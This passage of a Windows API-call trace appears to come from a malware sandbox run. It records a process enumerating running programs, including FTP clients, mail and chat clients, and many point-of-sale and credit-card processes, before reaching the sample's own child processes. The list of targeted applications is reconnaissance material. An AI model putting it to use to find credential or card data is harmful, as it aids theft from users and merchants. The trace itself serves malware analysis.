th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0092.559] GetTickCount () returned 0x11725bd [0092.560] GetCurrentThreadId () returned 0x8c4 [0092.560] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.560] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.560] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x98c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0092.561] GetTickCount () returned 0x11725bd [0092.561] GetCurrentThreadId () returned 0x8c4 [0092.561] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.561] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.561] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x99c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0092.562] GetTickCount () returned 0x11725bd [0092.562] GetCurrentThreadId () returned 0x8c4 [0092.563] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.563] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.563] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0092.564] GetTickCount () returned 0x11725bd [0092.564] GetCurrentThreadId () returned 0x8c4 [0092.564] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.564] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.564] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0092.565] GetTickCount () returned 0x11725bd [0092.565] GetCurrentThreadId () returned 0x8c4 [0092.565] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.565] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.565] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0092.567] GetTickCount () returned 0x11725bd [0092.567] GetCurrentThreadId () returned 0x8c4 [0092.567] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.567] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.567] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0092.568] GetTickCount () returned 0x11725bd [0092.568] GetCurrentThreadId () returned 0x8c4 [0092.568] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.568] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.568] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0092.570] GetTickCount () returned 0x11725bd [0092.570] GetCurrentThreadId () returned 0x8c4 [0092.570] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.570] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.570] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0092.571] GetTickCount () returned 0x11725bd [0092.571] GetCurrentThreadId () returned 0x8c4 [0092.571] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.571] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.571] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0092.573] GetTickCount () returned 0x11725bd [0092.573] GetCurrentThreadId () returned 0x8c4 [0092.573] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.573] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.573] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0092.574] GetTickCount () returned 0x11725bd [0092.574] GetCurrentThreadId () returned 0x8c4 [0092.574] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.574] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.574] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0092.575] GetTickCount () returned 0x11725cc [0092.575] GetCurrentThreadId () returned 0x8c4 [0092.575] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.575] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.575] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0092.577] GetTickCount () returned 0x11725cc [0092.577] GetCurrentThreadId () returned 0x8c4 [0092.577] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.577] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.577] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0092.578] GetTickCount () returned 0x11725cc [0092.578] GetCurrentThreadId () returned 0x8c4 [0092.578] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.578] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.578] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0092.579] GetTickCount () returned 0x11725cc [0092.579] GetCurrentThreadId () returned 0x8c4 [0092.579] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.579] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.579] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0092.581] GetTickCount () returned 0x11725cc [0092.581] GetCurrentThreadId () returned 0x8c4 [0092.581] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.581] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.581] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0092.583] GetTickCount () returned 0x11725cc [0092.583] GetCurrentThreadId () returned 0x8c4 [0092.583] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.583] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.583] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0092.584] GetTickCount () returned 0x11725cc [0092.584] GetCurrentThreadId () returned 0x8c4 [0092.584] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.584] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.584] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0092.585] GetTickCount () returned 0x11725cc [0092.585] GetCurrentThreadId () returned 0x8c4 [0092.585] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.586] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.586] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0092.587] GetTickCount () returned 0x11725cc [0092.587] GetCurrentThreadId () returned 0x8c4 [0092.587] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.587] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.587] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xabc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0092.588] GetTickCount () returned 0x11725cc [0092.588] GetCurrentThreadId () returned 0x8c4 [0092.588] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.588] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.588] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xacc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0092.590] GetTickCount () returned 0x11725cc [0092.590] GetCurrentThreadId () returned 0x8c4 [0092.590] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.590] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.590] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xadc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0092.591] GetTickCount () returned 0x11725cc [0092.591] GetCurrentThreadId () returned 0x8c4 [0092.591] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.591] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.591] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0092.592] GetTickCount () returned 0x11725dc [0092.592] GetCurrentThreadId () returned 0x8c4 [0092.592] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.592] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.592] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xafc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0092.593] GetTickCount () returned 0x11725dc [0092.593] GetCurrentThreadId () returned 0x8c4 [0092.594] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.594] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.594] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0092.595] GetTickCount () returned 0x11725dc [0092.595] GetCurrentThreadId () returned 0x8c4 [0092.595] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.595] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.595] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0092.596] GetTickCount () returned 0x11725dc [0092.596] GetCurrentThreadId () returned 0x8c4 [0092.596] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.596] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.596] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0092.597] GetTickCount () returned 0x11725dc [0092.598] GetCurrentThreadId () returned 0x8c4 [0092.598] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.598] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.598] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0092.599] GetTickCount () returned 0x11725dc [0092.599] GetCurrentThreadId () returned 0x8c4 [0092.599] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.599] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.599] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0092.600] GetTickCount () returned 0x11725dc [0092.600] GetCurrentThreadId () returned 0x8c4 [0092.600] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.600] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.600] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0092.601] GetTickCount () returned 0x11725dc [0092.601] GetCurrentThreadId () returned 0x8c4 [0092.601] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.601] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.601] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="ecuador.exe")) returned 1 [0092.603] GetTickCount () returned 0x11725dc [0092.603] GetCurrentThreadId () returned 0x8c4 [0092.603] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.603] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.603] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="string_encouraged_peers.exe")) returned 1 [0092.604] GetTickCount () returned 0x11725dc [0092.604] GetCurrentThreadId () returned 0x8c4 [0092.604] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.604] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.604] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="statutestevens.exe")) returned 1 [0092.605] GetTickCount () returned 0x11725dc [0092.605] GetCurrentThreadId () returned 0x8c4 [0092.605] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.605] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.605] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="baptist-lafayette.exe")) returned 1 [0092.607] GetTickCount () returned 0x11725ec [0092.607] GetCurrentThreadId () returned 0x8c4 [0092.607] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.607] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.607] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="summaries.exe")) returned 1 [0092.608] GetTickCount () returned 0x11725ec [0092.608] GetCurrentThreadId () returned 0x8c4 [0092.608] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.608] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.608] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0092.609] GetTickCount () returned 0x11725ec [0092.609] GetCurrentThreadId () returned 0x8c4 [0092.609] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.609] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.609] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x85c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0092.610] GetTickCount () returned 0x11725ec [0092.610] GetCurrentThreadId () returned 0x8c4 [0092.610] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.610] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.610] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0xa98, pcPriClassBase=13, dwFlags=0x0, szExeFile="%LOCALAPPDATA%24fd5b09-6d4d-435f-beb9-3d272f67be2cSAMPLE.EXE.exe")) returned 1 [0092.611] GetTickCount () returned 0x11725ec [0092.611] GetCurrentThreadId () returned 0x8c4 [0092.611] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.611] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.612] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x934, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="updatewin.exe")) returned 1 [0092.613] GetTickCount () returned 0x11725ec [0092.613] GetCurrentThreadId () returned 0x8c4 [0092.613] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.613] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.613] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x964, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x7f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="5.exe")) returned 1 [0092.614] GetTickCount () returned 0x11725ec [0092.614] GetCurrentThreadId () returned 0x8c4 [0092.614] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.614] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.614] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x8e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="updatewin1.exe")) returned 1 [0092.615] GetTickCount () returned 0x11725ec [0092.615] GetCurrentThreadId () returned 0x8c4 [0092.615] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.615] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.615] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x9c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="powershell.exe")) returned 1 [0092.616] GetTickCount () returned 0x11725ec [0092.616] GetCurrentThreadId () returned 0x8c4 [0092.616] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.616] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.616] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0092.617] 